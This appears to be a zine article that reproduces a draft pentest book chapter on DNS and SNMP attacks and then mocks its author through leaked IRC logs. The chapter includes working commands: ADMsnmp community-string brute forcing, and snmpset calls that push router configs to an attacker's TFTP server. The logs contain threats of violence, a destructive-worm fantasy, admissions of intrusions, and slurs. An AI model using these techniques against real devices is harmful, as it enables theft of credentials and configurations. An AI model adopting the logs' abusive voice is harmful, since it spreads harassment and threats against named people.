SIG record bug, affecting BIND 4.9.5,  4.9.5  patch  level  1,  4.9.6,  8.1,
8.1.1, 8.2, 8.2 patch level 1 and 8.2.1
MAXDNAME bug, affecting BIND 4.9.5,  4.9.5  patch  level  1,  4.9.6,  4.9.7,
4.9.8, 8.1, 8.1.1, 8.1.2, 8.2, 8.2 patch level 1,  8.2.1,  8.2.2  and  8.2.2
patch level 1

Exploit scripts for some of these  vulnerabilities  are  publicly  available
from archive  sites  such  as  Packet  Storm  (
Various public tools to assess and exploit remote code execution  bugs  have
been harvested and can be found at

Microsoft DNS Service Vulnerabilities

Windows 2000 in particular ships with built-in DNS services running. As  the
Windows platform moves towards a native  Active  Directory  model,  historic
naming services such as WINS are being superceded by DNS.

At the time of writing, there is no easy  way  of  listing  current  Windows
2000 Server DNS vulnerabilities. Due to the way that DNS is built  into  the
core operating system, you must currently  trawl  through  an  abundance  of
vulnerabilities    on    the     Microsoft     Technet     Security     site
(  before  coming  across  specific   DNS
server issues. A Google web search however, will  often  spread  light  over
recent problems.

DNS Information Leaks

Until recently, Checkpoint Firewall-1 shipped with a DNS allow  any  to  any
rule within its default policy. Many other firewalls also suffer  from  this
oversight, and so it is often possible to access  DNS  services  running  on
internal systems that really shouldn't be  providing  name  service  to  the

During a penetration test  I  undertook  in  1998  against  a  multinational
corporation, I was able to find that many internal network  devices  used  a
large  class-a  IP  space  (using  IP  addresses   gleaned   through   other
information leak vulnerabilities in SMTP and HTTP  servers  in  particular).
After initial port scanning, I found a handful of  accessible  DNS  servers,
which in turn seemed to be connected to the internal network. I was able  to
enumerate  internal  hosts  and  networks  through  one   name   server   in
particular, allowing me to build a detailed  map  of  the  internal  network

It is sometimes possible to connect directly to DNS  servers  on  peripheral
network boundaries (using UDP port  53),  and  issue  requests  relating  to
internal IP addresses, host names  and  networks,  as  shown  in  figure  xx

           Figure xx: Using nslookup to map internal IP addresses
   # nslookup
   > set querytype=any
   > server
   Default server:
   ;; connection timed out; no servers could be reached
   ;; connection timed out; no servers could be reached
   Address:       name = exchange.internal-

An automated reverse DNS sweep tool such as ghba can  even  be  modified  to
query a specific name server for  internal  network  information,  this  can
also  be  achieved  without  modifying   source   code   by   setting   your
/etc/resolv.conf file to point at the target name  server  instead  of  your
local DNS servers.


The Simple Network Management Protocol service  listens  on  UDP  port  161.
SNMP is often found  running  on  network  infrastructure  devices  such  as
managed switches, routers and other appliances. Increasingly,  SNMP  can  be
found  running  on  Unix-based  and  Windows  servers  for  central  network
management purposes.

SNMP  authentication  is  very  simple  and  is  sent  across  networks   in
plaintext. SNMP MIB (Management Information  Base)  data  can  be  retrieved
from a device by specifying the correct read community string, and SNMP  MIB
data can be written to a device using the correct write community string.

MIB databases contain ASCII listings  of  OID  (Object  Identifier)  values,
such as routing table information, network statistics,  details  of  network
interfaces, and other information. Accessing a router  MIB  is  useful  when
performing further network reconnaissance and mapping.

When a remote attacker is faced with an SNMP service, he has two options:

Brute force SNMP community strings to access and manipulate OID values
Send malformed data to a vulnerable SNMP service, causing a buffer  overflow
resulting in either a service crash or arbitrary code being executed on  the
host or device

Two useful tools that are used by attackers and security  consultants  alike
for brute forcing SNMP community  strings  and  accessing  MIB  entries  are
ADMsnmp and snmpwalk.


The  ADMsnmp  tool  is  available  from  the  ADM   group   home   page   at The utility is  an  effective  command-line  community
string brute force utility, and will run  under  most  Unix-like  platforms,
including Linux and FreeBSD. Figure xx below shows the ADMsnmp tool  in  use
against a Cisco router at to  find  that  the  community  string
private has write access.

       Figure xx: Using ADMsnmp to brute force valid community strings
   # ADMsnmp
   ADMsnmp vbeta 0.1 (c) The ADM crew
   greets: !ADM,, ansia
   >>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>>
   >>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>>
   >>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>>
   >>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>>
   <<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0
   >>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
   >>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>>
   <<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0
   >>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>>
   <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0
   >>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>>
   <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0
   >>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>>
   >>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>>
   >>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>>
   >>>>>>>>>>> get req name=all private  id = 32 >>>>>>>>>>>
   >>>>>>>>>>> get req name= private  id = 35 >>>>>>>>>>>
   >>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>>
   >>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>>

   <!ADM!>         snmp check on
   name = private write access


The snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite  of
tools available from The Net-SNMP toolkit  can  be
built on  both  Unix  and  Windows  platforms,  and  contains  other  useful
utilities including snmpset (used to modify and set  specific  OID  values).
Snmpwalk is used with the correct community string to  download  the  entire
MIB database from the target device (unless a specific OID value to walk  is
provided by the user). Figure xx below  shows  the  snmpwalk  utility  being
used to download the MIB database from a Cisco router. The MIB  is  actually
around seven pages in length, so only the first 8 OID values  are  presented
here as an example.

          Figure xx: Using snmpwalk to access the MIB through SNMP
   # snmpwalk -c public
   system.sysDescr.0 = Cisco Internetwork Operating System
   Software IOS (tm) C2600 Software (C2600-IS-M), Version
   12.0(6), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1999 by
   cisco Systems, Inc. Compiled Wed 11-Aug-99 00:16 by phanguye
   system.sysObjectID.0 = OID: enterprises.9.1.186
   system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28
   system.sysContact.0 =
   system.sysName.0 =
   system.sysLocation.0 =
   system.sysServices.0 = 78
   system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00

Default Community Strings

Most  routers,  switches  and  wireless  access  points  from  Cisco,  3Com,
Foundry, D-Link  and  other  companies  use  public  and  private  as  their
respective default read and write  SNMP  community  strings.  The  community
string list provided with the ADMsnmp brute force  program  includes  cisco,
router, enable, admin, read, write and other obvious  values.  It  is  often
recommended that when assessing routers or devices belonging to  a  specific
organization, that you tailor your list accordingly (including  the  company
name and other values that may be used in that instance).

Compromising Devices Through Reading from SNMP

Many Windows NT and 2000 servers run  SNMP  services,  using  the  community
string   of   public   for   read   access.   By   walking    through    the OID within  a  Windows  NT  or  2000  server,  we  can
enumerate user names of active accounts on the target host

   # snmpwalk -c public .
   enterprises. =
   . = "Administrator"
   enterprises. = "TsInternetUser"
   enterprises. = "NetShowServices"

In the above example, the usernames Chris and Administrator are  identified,
along   with   the   built-in    Windows    IUSR_hostname,    IWAM_hostname,
TsInternetUser and NetShowServices users.

      Various wireless access points and other hardware appliances have been
      known to contain passwords and details of writable  community  strings
      within the accessible MIB. It is highly recommended that for each  MIB
      downloaded from a device over SNMP, each OID value should  be  checked
      by hand to ensure that any sensitive information is gleaned.

Compromising Devices Through Writing to SNMP

If you have compromised the write community string of a Cisco IOS or  Ascend
branded device, a useful attack to gain direct access is to first set  up  a
TFTP server on an accessible Internet host, and then modify key  OID  values
on  the  target  device  over  SNMP  using  snmpset  so  that   the   device
configuration file (containing direct access passwords under  Cisco  IOS  in
particular) can be uploaded to us through  TFTP.  Examples  of  this  attack
against Cisco IOS and Ascend network devices are shown in figures xx and  xx

        Figure xx: Writing Cisco IOS OID values to upload the devices
        configuration file to a TFTP server listening at
   # snmpset -r 3 -t 3 private
   . s "cisco-config"

         Figure xx: Writing Ascend OID values to upload the devices
        configuration file to a TFTP server listening at
   # snmpset -r 3 -t 3 private
   . a ""
   # snmpset -r 3 -t 3 private
   . s "ascend-config"

In order for  this  attack  to  work,  we  must  install  and  configure  an
accessible TFTP server for the appliance to upload  its  configuration  file
to. This can either be achieved from a Unix-based platform by modifying  the
/etc/inetd.conf file to run tftpd  from  inetd,  or  using  a  Windows  TFTP
server, such as the Cisco TFTP Server,  available  from
bin/ One key  point  to  remember  when  performing  this
exploit is to ensure your TFTP server is writeable so that  the  device  can
upload its configuration file.

SNMP running on hardware  appliances  in  particular  can  be  imaginatively
abused by writing to a plethora of different OID values,  from  modification
of routing tables, to uploading new firmware and configuration files. It  is
often best to test SNMP attacks in a lab environment before performing  them
in  live  networks,  as  crashing  routers,  switches  and  other   critical
infrastructure devices is often undesirable.

Compromising Devices Through Overflowing SNMP

In 2001, a series  of  SNMP  overflows  were  released  for  most  operating
platforms, including Windows and Unix-based systems.


The Trivial File Transfer Protocol service listens on UDP port  69,  and  is
often found running on  network  infrastructure  devices  including  managed
switches and routers. TFTP is most used by network  administrators  for  the
purposes of  configuration  file  and  firmware  upload  and  download  when
installing and configuring devices.

Cisco 1600 series router proof of concept TFTP exploit


Dynamic  Host  Configuration  Protocol  (known  as  either  BOOTP  in   Unix
environments, or DHCP in Windows environments) allows diskless  workstations
to retrieve network and configuration details  from  the  local  network  on
boot. The service itself listens on UDP port 67,  with  UDP  port  68  being
used by clients for the receipt of network configuration details.


Udp 513

Who, rwho?

Port 137 netbios-ns

NetBIOS name service (UDP)

firewalls: Firewall administrators will  frequently  see  large  numbers  of
incoming packets to port 137.  This  is  due  to  the  behavior  of  Windows
servers that use NetBIOS (as well as DNS) to resolve IP addresses  to  names
using the "gethostbyaddr()" function. As users  behind  the  firewalls  surf
Windows-based web sites, those servers will frequently respond with  NetBIOS

Port 138 netbios-dgm (UDP)

NetBIOS datagram (UDP)

Used by Windows (and services on UNIX like SAMBA). The main  danger  on  the
Internet is that by crafting special messages sent to this  port,  a  hacker
can convince Windows that  their  machine  is  "local",  and  can  therefore
bypass some of Microsoft's  security  settings  that  differentiate  between
"local" and "internet" zones.

--[3. Assorted IRC Logs - A Journey into My Psyche

This is for you guys that weren't in some of the channels I hang out in.
As you can see, I anounced my book quite some time ago ;)

[00:07:27] <so1o> i'm writing a book for o'reilly about pentesting
[00:07:31] <so1o> it'll be out in a couple of months
[00:07:36] <so1o> they paid me a fat advance
[00:07:38] <Haggis> nice
[00:07:44] <so1o> all i gotta do now is finish it
[00:07:53] <Haggis> lol.. yeah.. thats always the problem
[00:08:04] <so1o> yeah well i wrote 70,000 words already
[00:08:12] <so1o> i got another 10,000 or so to go
[00:08:22] <so1o> writing about msrpc security atm
[00:08:29] <so1o> enumerating users through the samr interface
[00:08:30] <so1o> alsortz
[00:08:36] <so1o> msrpc is bonkers
[00:08:41] <so1o> no-one should run that shit on the internet
[00:08:44] <Haggis> lol.. yup... sure is
[00:08:46] <so1o> its full of bugs
[00:08:58] <Haggis> i think they're called 'features'
[00:09:02] <so1o> ha
[00:09:13] <so1o> theres a fundemental flaw in netbios-dgm
[00:09:18] <so1o> that microsoft refuse to patch
[00:09:27] <so1o> because it would mean re-writing half their netbios code
[00:09:38] <Haggis> who the fuck wants netbios anyway?
[00:09:44] <so1o> companies
[00:09:48] <so1o> with big internal networks
[00:09:48] <so1o> :/
[00:09:57] <so1o> thats ok tho
[00:09:59] <Haggis> oh yeah... only half the world!
[00:10:01] <so1o> keeps people like me in a job

[19:58:53] <kraft> do you guys have an oreilly bookshelf
[19:59:58] <so1o> yo yo
[20:00:03] <so1o> <kraft> do you guys have an oreilly bookshelf
[20:00:05] <so1o> :/
[20:00:12] <so1o> im writing a book for oreilly
[20:00:17] <so1o> it gets published in november
[20:00:23] <kraft> which book ?
[20:00:29] <so1o> network security assessment
[20:00:43] <so1o> its about professional pen-testing
[20:00:48] <so1o> internet-based
[20:00:50] <B-r00t> got any samples? .
[20:01:03] <giles> yeah that would be cool to check out
[20:01:22] <so1o> b-r00t nah itz under technical review
[20:01:31] <so1o> i got to pick 3 of my 7 technical reviewers
[20:01:39] <so1o> so picked john mcdonald, ben laurie and david litchfield
[20:01:43] <so1o> its going to be a dark book
[20:02:07] <giles> who is the target of the book
[20:02:21] <so1o> like technical systems / network administrators
[20:02:24] <so1o> and it security teams
[20:02:53] <giles> will you give real world examples of the starting phase
to the end phase, dealing with correct ways to write contracts
[20:02:54] <giles> and such
[20:03:03] <so1o> bro
[20:03:07] <so1o> its a dark book
[20:03:11] <so1o> whats ur email addr
[20:03:16] <so1o> i'll mail u a pdf of chapter 4
[20:03:19] <so1o> the darkest chapter so far
[20:03:20] <so1o> ;]
[20:03:21] <B-r00t> yu got mine!
[20:03:30] <giles> i just msged you mine
[20:03:33] <so1o> wrd
[20:03:36] <so1o> i'll hit u up holmez
[20:03:36] <giles> thx man
[20:03:38] <so1o> drop me a line back
[20:03:43] <so1o> with some comments
[20:04:12] <B-r00t> if yu share yer shit on here ...most co0l ppl will give
yu honest critz...
[20:04:16] <kraft> have you seen that open soure pen test methodology
project ?
[20:04:22] <so1o> yeah its shit
[20:04:27] <so1o> peter herzog is a fucking punk
[20:04:32] <kraft> heh
[20:04:35] <so1o> my book is based on cesg check
[20:04:37] <so1o> and nsa iam
[20:04:45] <so1o> the proper testing methodologies
[20:04:58] <kraft> are you check team leader ?
[20:05:48] <so1o> nope
[20:06:02] <so1o> our company doesnt subscribe to check
[20:06:05] <so1o> 7k/year
[20:06:16] <so1o> yo kraft ru from the uk
[20:06:19] <so1o> what do u do
[20:06:40] <kraft> yup
[20:06:53] <kraft> pen test, consultant etc
[20:07:33] <B-r00t> im a builder .. heh
[20:07:56] <B-r00t>
[20:08:01] <marshal-l> I'm a mechanic
[20:09:27] <so1o> ok mail sent
[20:09:32] <so1o> chapter 4 is all about scanning
[20:09:39] <so1o> the later chapters drill down into services
[20:09:46] <so1o> web, ftp, sql, bla blah blaha
[20:10:29] <B-r00t> this sounds goos dude ...
[20:10:46] <B-r00t> if yu want to host it here ...ill give yu a slot!
[20:10:57] <B-r00t> s/goos/good/ ..soz
[20:11:19] <so1o> bro
[20:11:25] <so1o> its being published by oreilly
[20:11:26] <so1o> in november
[20:11:28] <so1o> u klutz
[20:11:29] <so1o> ;]
[20:11:38] <B-r00t> oh right yeah sorry ... the big time ..wo0two0t!
[20:11:42] <so1o> exactly
[20:11:44] <so1o> teh big time!
[20:11:53] <giles> you are going to have major bling
[20:12:01] <giles> get your teeth all iced
[20:12:10] <so1o> yeah well i got my advance last week
[20:12:15] <so1o> 5k
[20:12:18] <giles> not bad
[20:12:25] <giles> how long did it take to write
[20:12:26] <giles> ?
[20:12:30] <so1o> yeah considering most of the book is written
[20:12:34] <so1o> 3 years so far on and off
[20:12:39] <so1o> probably 6 months
[20:12:43] <so1o> of determined effort
[20:12:44] <so1o> ;]
[20:12:48] <giles> nice
[20:12:56] <so1o> hit me up with some feedback
[20:13:08] <so1o> and i might send over some other chapters
[20:13:13] <so1o> my web assessment chapter is dark

[10:38:34] <so1o> lemme paste the chapter list..
[10:38:57] <so1o> Chapter 1, Network Security Assessment, introduces and
discusses the rationale behind network security assessment and the fact that
assurance of security is a process and not simply a product.
[10:38:57] <so1o> Chapter 2, The Tools Required, covers the various
Unix-based operating platforms and tool kits that determined attackers and
network security professionals can be found using.
[10:38:57] <so1o> Chapter 3, Internet Host & Network Enumeration, logically
walks through the Internet-based options that a potential attacker has to
map your network from open web searches through to DNS sweeping and querying
of authoritative name servers.
[10:38:57] <so1o> Chapter 4, IP Network Scanning, discusses all known IP
network scanning techniques and their relevant application, also listing
tools and systems that support such scanning types. IDS evasion and
low-level packet analysis techniques are also covered.
[10:38:57] <so1o> Chapter 5, Assessing Remote Information Services, defines
the techniques and tools used to execute information leak attacks against
services such as LDAP, auth, finger and DNS. Some process manipulation
attacks are discussed here where appropriate.
[10:38:57] <so1o> Chapter 6, Assessing Web Services, comprehensively covers
the assessment of web services including IIS, Apache, OpenSSL and other
components such as Frontpage Extensions and Outlook Web Access. Risk
mitigation strategies are also detailed, including use of egress network
filtering and web service configuration.
[10:38:58] <kraft> k
[10:39:18] <so1o> then 7 - 12 are all about specific services, rpc, windows
services, etc.
[10:39:25] <so1o> 13 is about application security
[10:39:47] <so1o> 14 is about example assessment methodologies (against
win2k web server, linux mail server and cisco ios router)
[10:39:55] <so1o> and then its onto the appendices

Sometimes my friends and I play this game called, "Think Like a Hacker,"
where we try to imagine what we would do if we weren't some of England's
best paid and well established ethical hackers :)

[19:52:47] <so1o> there are plenty more bugs in rpc
[19:52:50] <so1o> someone should find one
[19:52:55] <so1o> and write a new worm
[19:53:00] <so1o> i.e. not publicize it
[19:53:03] <so1o> if i did that
[19:53:07] <so1o> i'd write the most darkside worm
[19:53:10] <so1o> that just spread
[19:53:16] <so1o> and after 48 hours rm'd the boxes

[22:20:29] <so1o> whats new in nmap
[22:20:33] <so1o> i need to update my book chapter

[22:24:55] <kraft_> did matta have a stand at infosec ?
[22:25:22] <so1o> nah we never do
[22:25:28] <so1o> its too expensive

See the comments on TESO below :)

[15:05:36] <so1o> i talk about telnetfp in my book
[15:05:44] <so1o> its the best thing for fingerprinting telnet services

[16:43:40] <so1o> i have a digital camcorder
[16:43:49] <so1o> i cAN MAKE MOVIES
[16:45:52] <so1o> !!!!!!!!!!!!!!!11

Hmm... maybe I can send the techtv editors a last-minute submission
for that hacking special they did on phobos/cold-fire/cjunkie.

[23:38:54] <so1o> ha
[23:39:01] <so1o> i have 7350buttseckz
[23:39:09] <so1o> teso are fucking retarded anyhow
[23:39:10] <so1o> f teso

NOTE: teso made the hacking part of this book possible.

[23:45:46] <so1o> f attrition
[23:45:51] <so1o> brian martin is a punk
[23:45:53] <so1o> if i ever meet him
[23:45:58] <so1o> im gonna remix him
[23:46:20] <so1o> he is a stupid cunt
[23:46:27] <so1o> honestly tho
[23:46:32] <so1o> i would have no regrets
[23:46:36] <so1o> in breaking his legs
[23:46:43] <so1o> i would do jail time for that
[23:47:02] <so1o> fucking punk

NOTE: Without the mirrors of my defacements provided
in hyperlink format on my resume, I might still be unemployed today!

[23:50:46] <so1o> im writing a book for oreilly
[23:50:48] <so1o> about pentesting
[23:50:55] <embrey> oh yah ? nice.
[23:50:58] <embrey> good money in that ?
[23:50:59] <so1o> it'll be published in january..
[23:51:03] <so1o> yeah well 8k usd advance
[23:51:08] <so1o> and 10% royalties
[23:51:13] <embrey> first book ?
[23:51:17] <so1o> yep
[23:51:21] <embrey> congrats
[23:51:27] <so1o> yeah well it took me over 2 years
[23:51:36] <so1o> to get oreilly to agree to acquire me
[23:51:37] <embrey> it's a phone book huh ?
[23:51:38] <so1o> as an author
[23:51:45] <so1o> nop this is the thing
[23:51:54] <so1o> when its published it'll be 280-300 pages
[23:51:58] <so1o> hacking exposed is like 800 pages
[23:52:00] <so1o> of shit
[23:52:02] <embrey> yep they all are
[23:52:09] <embrey> all get pirated now to
[23:52:17] <so1o> john mcdonald, david litchfield, ben laurie
[23:52:20] <so1o> and a few other ppl
[23:52:23] <so1o> are doing my technical review
[23:52:26] <embrey> they contributed to it ?
[23:52:30] <so1o> i got to pick my own tech reviewers
[23:52:30] <so1o> ;]
[23:52:33] <embrey> nice
[23:52:49] <so1o> yeah so thats going to make it pretty lockdown
[23:52:52] <so1o> in terms of info

[23:53:39] <so1o> hacker cracker
[23:53:43] <embrey> yah yah
[23:53:43] <so1o> by that ejovi guy
[23:53:51] <so1o> joej__
[23:53:53] <so1o> or something
[23:53:56] <embrey> yah
[23:54:06] <so1o> yeah f him
[23:54:10] <so1o> all those american cunts

[00:05:40] <embrey> are you the so1o those phc guys hate ?
[00:06:47] <so1o> yeah
[00:06:49] <so1o> f phc
[00:06:51] <so1o> they are fake as fuck
[00:06:55] <embrey> i thought i reconized the nick
[00:06:58] <embrey> didn't know from where.
[00:06:58] <so1o> i used to be on phc
[00:07:03] <so1o> when gayh1tler ran it
[00:07:07] <so1o> then he left
[00:07:14] <embrey> that's the guy that runs the mailinglist no ?
[00:07:17] <so1o> and all these new ppl started jumping up
[00:07:21] <so1o> like jimjones
[00:07:22] <embrey> all these people and grps are confusing as shit
[00:07:24] <so1o> and halfdead
[00:07:29] <so1o> = fake phc
[00:07:31] <embrey> he's a ass
[00:07:35] <so1o> yeah 4rea
[00:07:36] <so1o> l
[00:07:37] <so1o> thatz about it
[00:07:44] <embrey> i've seen tons of logs with him. does nothing but insult
[00:07:50] <so1o> exactly
[00:07:55] <so1o> but yeah
[00:07:56] <so1o> itz me
[00:08:00] <so1o> the imfam0uz
[00:08:00] <embrey> talk about how he wrote dos virii in nineteen fucking
eight two or some shit
[00:08:29] <so1o> the funny thing is when i go into meetings
[00:08:34] <so1o> with sec ppl from banks or whatnot
[00:08:39] <so1o> 'werent u that so1o guy'
[00:08:42] <so1o> 'from back in the day'
[00:08:46] <so1o> hahaahaaaaaaaaaaa
[00:08:46] <so1o> cunts
[00:08:59] <embrey> it doesn't hold you back ? lose any jobs because of it ?
[00:09:15] <so1o> nah well this is the thing
[00:09:20] <so1o> we lost a 300k pentesting deal because of it
[00:09:33] <so1o> because of in particular
[00:09:36] <so1o> but other than that
[00:09:39] <so1o> everythings cool
[00:09:43] <so1o> a lot of our clients think its neat
[00:09:49] <so1o> that i kno what im talking about
[00:09:54] <so1o> and we have a lot of big clients
[00:10:04] <embrey> there's that kind of money in that ?
[00:10:09] <so1o> merrill lynch, barclays, american express
[00:10:10] <so1o> yeah
[00:10:14] <so1o> big dollar in proper pentesting
[00:10:19] <so1o> like framework agreements

Thanks for looking past our disagreements in the past and letting me
publish this article in your wonderful magazine, PHC!

[00:12:14] <embrey> so attrition guys ratted you out for defacements ?
[00:12:23] <so1o> yeah basically
[00:12:30] <so1o> and linked me to antionline
[00:12:33] <so1o> all sorts of shit
[00:12:40] <embrey> they were real cozy with pigs eh ?
[00:12:49] <embrey> eww antionline ?
[00:13:21] <so1o> yeah
[00:13:33] <so1o> back in the day i was investigating using antionline for
marketing space
[00:13:34] <embrey> you hacked it right ?
[00:13:36] <so1o> like banners and whatnot
[00:13:39] <so1o> yeah well i hacked it too
[00:13:41] <so1o> in the end

[00:14:37] <so1o> when my book drops everything will get remixed

[00:15:36] <so1o> yeah embrey well i figured if i wrote a book, i wouldnt
have trouble getting a job ever again

[00:17:11] <embrey> mister so1o your old huh ?
[00:17:14] <so1o> 23
[00:17:20] <embrey> oh ok
[00:17:31] <so1o> left school at 17
[00:17:33] <so1o> fuck that shit
[00:17:34] <so1o> get a job
[00:17:41] <so1o> i worked at EDS for like 6 weeks
[00:17:41] <embrey> some www had you listed as 38 hehe
[00:17:44] <so1o> and got fired
[00:17:47] <so1o> for winnuking the fuck
[00:17:50] <embrey> peroit old company
[00:17:55] <so1o> out of the people i didnt like
[00:17:56] <so1o> :/
[00:18:16] <so1o> "MUST BE A HARDWARE PROBLEM!"
[00:18:18] <so1o> haaaaaaaa
[00:18:20] <so1o> fucking cunts

[00:24:16] <embrey> so you work for barclays now ? i heard something about
their atms' this week
[00:24:23] <so1o> nah i dont work for barclays
[00:24:26] <so1o> i work for matta
[00:24:29] <so1o> matta is my company
[00:24:37] <embrey> and in turn they work for barclays...
[00:24:42] <so1o> there are only 5 of us
[00:24:44] <flame> hmm
[00:24:45] <so1o> yeah exactly

[00:28:56] <so1o> i like el8 magazine

[14:24:54] <so1o> has anyone seen phrack 62
[14:24:55] <so1o> the fake one
[14:25:00] <so1o> thats a lot like ~el8 magazine
[14:25:19] <Haggis> no.. haven't read it ... yer book or phrack that is...
can you /msg me the the link and i'll get it done this evening...
[14:25:35] <Haggis> you mentioned a SQL section ...
[14:25:47] <so1o> yeah
[14:25:49] <so1o> exactly
[14:26:23] <so1o> xp_regread
[14:26:23] <so1o> The xp_regread procedure allows us to dump registry keys
from the database server. In particular this is useful to glean encrypted
password strings for software such as VNC, or the Windows SAM database (if
SYSKEY encryption is not in use). To dump the SAM from the registry, we
would issue the following command:
[14:26:23] <so1o> EXEC xp_regread
[14:26:25] <so1o> !!!!!!!!!!1111
[14:26:56] <Haggis> linsql can do that too.. well, the non-public version ;)
[14:27:04] <so1o> linsqqqqqqqlllllll
[14:27:09] <so1o> bro u gotta hook it up
[14:27:15] <so1o> so ican put it in my oreilly book
[14:27:19] <so1o> and mAKE U FAM0UZ
[14:27:44] <Haggis> no thanks ;)  i remember that kind of fame!
[14:28:01] <so1o> ha
[14:28:05] <so1o> every1 wantz to be fam0uz
[14:28:06] <so1o> me me me
[14:28:09] <so1o> make me a star!

[15:10:12] <so1o> idefense are funny
[15:10:16] <so1o> i want to work for them someday
[15:10:32] <so1o> i think they'll go out of business tho
[15:10:34] <giles> so1o: no more reads ?
[15:10:35] <so1o> by the end of the day
[15:10:37] <so1o> year
[15:10:43] <so1o> giles not today bro i'm locking down this chapter
[15:10:46] <so1o> on windows network services
[15:10:53] <so1o> 135, 137, 138, 139, 445
[15:10:59] <so1o> laying it down straight
[15:11:10] <giles> i would be curoius on your section dealing with linux and
nix based security
[15:11:12] <so1o> like did u kno u can brute force passwords of users in the
administrators group
[15:11:20] <so1o> through the wmi interface accessible via. port 135
[15:11:29] <so1o> ?
[15:11:37] <giles> cool, i look forward to reading about that
[15:11:48] <so1o> and then, when you've brute forced the pass
[15:11:51] <so1o> u can execute commands
[15:11:54] <lord> psexec
[15:11:57] <giles> yeah
[15:11:58] <B-r00t> we could have a daily hack classs for each chapter ..
[15:11:59] <so1o> through tcp/135
[15:12:06] <so1o> lord whats psexec

[11:42:45] <so1o> the book is the bane of my life
[11:42:56] <B-r00t> will make good money do0d ..will be worth it .
[11:43:06] <so1o> str8 up
[11:43:33] <so1o> yeah well thats the plan
[11:43:41] <so1o> my hidden agenda is to put foundstone out of business

J/k!!!!!!!!!!!!!!!!!! ;)

12:09:43] <so1o> hm
[12:09:49] <so1o> i might save that for my second book
[12:09:55] <so1o> which is about internal security
[12:10:01] <Haggis> milk it dude!
[12:10:11] <so1o> ;]
[12:10:16] <so1o> well the whole point with this one
[12:10:20] <so1o> is that its under 300 pages
[12:10:25] <so1o> of remote stuff
[12:10:35] <so1o> if i start talking about local stuff
[12:10:39] <so1o> it will turn out being hacking exposed
[12:10:41] <so1o> all over AGAIN

[16:16:55] <so1o> i cant wait until my book is published and the matta
business collects our outstanding invoices in oct/nov
[16:17:02] <so1o> then i might be able to upgrade my car
[16:17:08] <so1o> i drive a 1.0 vw polo atm..

Thanks PHC, for sending me 3APA3A's wire tranfer #!

[23:42:54] <so1o> my bank account is in positive territory
[23:42:58] <so1o> for the first time in 2 years
[23:42:59] <so1o> easily
[23:43:15] <B-r00t> thats always a good thing ..
[23:43:16] <so1o> only because i consolidated my overdraft with one of my
natwest loans
[23:43:24] <B-r00t> med~ ..yer late been out on it ?
[23:43:24] <so1o> and oreilly wired me some more of my advance

[16:31:42] <so1o> i'm writing a book for o'reilly about security

[23:19:41] <so1o> K-SP1FF
[23:19:44] <so1o> SP1FFTASTIC
[23:19:45] <so1o> !!!!1
[23:19:56] <so1o> im writing a book about hacking
[23:20:03] <so1o> o'reilly are going to publish it
[23:20:06] <so1o> and 12308218214082480 hackers
[23:20:08] <so1o> will be BORN
[23:20:09] <so1o> !!!1
[23:20:24] <so1o> HACKING FOR CUNTS
[23:20:26] <so1o> !
[23:20:28] <giles_> hahah
[23:20:29] <so1o> no
[23:20:37] <so1o> "network security assessment"
[23:20:47] <so1o> hacking for cunts would be a good name tho

[23:23:42] <so1o> i gotta keep my book lean tho bro
[23:23:43] <so1o> no cd
[23:23:45] <so1o> paperback
[23:23:49] <so1o> 250 pages or so
[23:23:53] <so1o> to keep the costs down
[23:23:59] <so1o> so we can regulate hacking exposed
[23:24:05] <so1o> some sort of 80 bucks or something
[23:24:10] <so1o> and my book will be 25


[23:25:29] <so1o> ha
[23:25:37] <so1o> i dont care if people e-book and pir8 it
[23:25:49] <so1o> infact i might e-book it myself

[23:25:56] <so1o> with all the parts the publisher want to take out
[23:26:01] <so1o> well they dont atm
[23:26:11] <so1o> but if they do get me to take out my CIA examples
[23:26:12] <so1o> or whatnot
[23:26:17] <so1o> i'll put out an underground e-book
[23:26:22] <so1o> like the uncensored version


[23:25:56] <so1o> with all the parts the publisher want to take out
[23:26:01] <so1o> well they dont atm
[23:26:11] <so1o> but if they do get me to take out my CIA examples
[23:26:12] <so1o> or whatnot
[23:26:17] <so1o> i'll put out an underground e-book
[23:26:22] <so1o> like the uncensored version

[23:26:37] <so1o> oh in chapter 3
[23:26:46] <so1o> i explain how to map the cia's network
[23:26:48] <so1o> internally and shit
[23:27:01] <so1o> using whois, dns, sending mail to
[23:27:02] <so1o> etc.
[23:27:08] <so1o> u can zone xfer the cia
[23:27:25] <so1o> dig axfr
[23:27:32] <so1o> its neat0

[23:28:05] <so1o> i wrote a white paper about it
[23:28:07] <so1o> for matta ages back
[23:28:11] <so1o>
[23:28:16] <so1o> - internet-based counterintelligence
[23:28:25] <so1o> oh and
[23:28:51] <so1o> ;; connect: Connection timed out
[23:28:51] <so1o> ; <<>> DiG 2.2 <<>> axfr
[23:28:51] <so1o> ; (1 server found)
[23:28:51] <so1o> ;; FROM: cyberforce to SERVER:
[23:28:51] <so1o> ;; WHEN: Tue Sep 30 00:55:32 2003
[23:28:58] <so1o> hm
[23:29:00] <so1o> timed out
[23:29:01] <so1o>
[23:29:02] <so1o> even
[23:30:02] <so1o> ok

[23:39:46] <so1o> i got busted back in 1999
[23:39:54] <so1o> for hacking some * boxes
[23:39:59] <so1o> and trying to break into
[23:40:02] <so1o> from there

[00:00:58] <so1o> so im writing a book for oreilly
[00:00:59] <so1o> they <3 me
[00:01:05] <so1o> they keep wiring me money
[00:01:10] <so1o> "i need more dollar"
[00:01:12] <so1o> "for my advance"
[00:01:19] <so1o> "plz send it ok thx!"

